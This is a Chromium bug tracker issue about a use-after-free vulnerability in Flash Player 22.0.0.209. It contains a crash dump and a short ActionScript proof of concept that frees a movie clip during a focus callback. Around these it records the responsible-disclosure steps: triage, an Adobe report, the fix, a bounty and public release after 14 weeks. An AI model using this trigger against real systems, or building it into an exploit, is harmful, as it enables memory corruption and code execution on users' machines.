New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 630544 link

Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Last visit > 30 days ago
Closed: Sep 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Windows , Chrome , Mac
Pri: 1
Type: Bug-Security



Sign in to add a comment

Security: use-after-free vulnerability in flash player 22.0.0.209

Reported by jiezengo...@gmail.com, Jul 22 2016

Issue description

VULNERABILITY DETAILS
There is a use-after-free vulnerability in flash player. Which could lead to code execution.

VERSION
Flash player 22.0.0.209 in Chrome windows 7 x86(other platform should be trigger also)

Please drag the test.swf into chrome will crash.

Please not public in MAPP and public it in chrome issues list 14 weeks after being marked as Fixed.

Credit is to "JieZeng of Tencent Zhanlu Lab".

Please report it as soon as possible.

chrome crash tate:

5b6583f1 e88a830500      call    pepflashplayer!PPP_ShutdownBroker+0x1bf58d (5b6b0780)
5b6583f6 84c0            test    al,al
5b6583f8 0f8502010000    jne     pepflashplayer!PPP_ShutdownBroker+0x16730d (5b658500)
5b6583fe 8b450c          mov     eax,dword ptr [ebp+0Ch]
5b658401 8b581c          mov     ebx,dword ptr [eax+1Ch]
5b658404 83bbfc00000002  cmp     dword ptr [ebx+0FCh],2 ds:0023:000000fc=????????

3:037> r
eax=0250a1a0 ebx=00000000 ecx=00000000 edx=02706000 esi=00000000 edi=0250a1a0
eip=5b658404 esp=0024d240 ebp=0024d450 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
pepflashplayer!PPP_ShutdownBroker+0x167211:
5b658404 83bbfc00000002  cmp     dword ptr [ebx+0FCh],2 ds:0023:000000fc=????????

3:037> dd eax
0250a1a0  0250a560 00000000 00000000 00000000
0250a1b0  00000000 00000000 00000000 00000000
0250a1c0  00000000 00000000 00000000 00000000
0250a1d0  00000000 00000000 00000000 00000000
0250a1e0  00000000 00000000 00000000 00000000
 
test.swf
48.2 KB Download
Owner: natashenka@google.com
Natalie, can you please triage this and file a bug with Adobe?
Thanks for reporting this! I'll report it to Adobe shortly.

Adding an approximate ActionScript PoC for this issue, since one wasn't included in the bug:

var m = this.createEmptyMovieClip("m", 1, 1, 2, 3, 4);
var subm = m.createEmptyMovieClip("subm", 2, 1, 2, 3, 4);

function f(){

    m.removeMovieClip();
    return false;

}

subm.addProperty( "focusEnabled", f, f);
Selection.setFocus( "subm");
Project Member

Comment 3 by sheriffbot@chromium.org, Jul 23 2016

Status: Assigned (was: Unconfirmed)
Components: Internals>Plugins>Flash
Labels: OS-Chrome OS-Linux OS-Mac OS-Windows
Labels: Security_Impact-Stable
Labels: Security_Severity-High
what is the PSIRT number?
Project Member

Comment 8 by sheriffbot@chromium.org, Jul 26 2016

Labels: M-52
Project Member

Comment 9 by sheriffbot@chromium.org, Jul 26 2016

Labels: Pri-1
@natashenka: I want to know this issue whether have a PSIRT number? And if this issue submitted by others,please let me know as soon as possible. Thanks!
Sorry to take so long to get back to you. This is PSIRT-5643, and I haven't heard from Adobe when it will be fixed yet. As far as I know, no one else has submitted this issue via the Chrome tracker. Otherwise, Adobe generally doesn't let people know whether issues submitted to them were duplicates until the issue is fixed.
@natashenka That's OK! I got it.
Status: ExternalDependency (was: Assigned)
Project Member

Comment 14 by sheriffbot@chromium.org, Sep 1 2016

Labels: -M-52 M-53

Comment 15 Deleted

Hi,
Fixed in Sep and what is the next program ?
Status: Fixed (was: ExternalDependency)
Marking this as fixed
Labels: reward-topanel
Project Member

Comment 19 by sheriffbot@chromium.org, Sep 23 2016

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Project Member

Comment 20 by sheriffbot@chromium.org, Sep 25 2016

Labels: Merge-Request-54

Comment 21 by dimu@chromium.org, Sep 26 2016

Labels: -Merge-Request-54 Merge-Approved-54 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M54 (branch: 2840)
Project Member

Comment 22 by sheriffbot@chromium.org, Sep 29 2016

This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 23 by sheriffbot@chromium.org, Oct 2 2016

This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Nothing to merge here.
Labels: -Hotlist-Merge-Approved -Merge-Approved-54
Labels: -reward-topanel reward-unpaid reward-3000
And $3,000 for this one!
Labels: reward-inprocess
Labels: -reward-unpaid
Project Member

Comment 30 by sheriffbot@chromium.org, Dec 30 2016

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment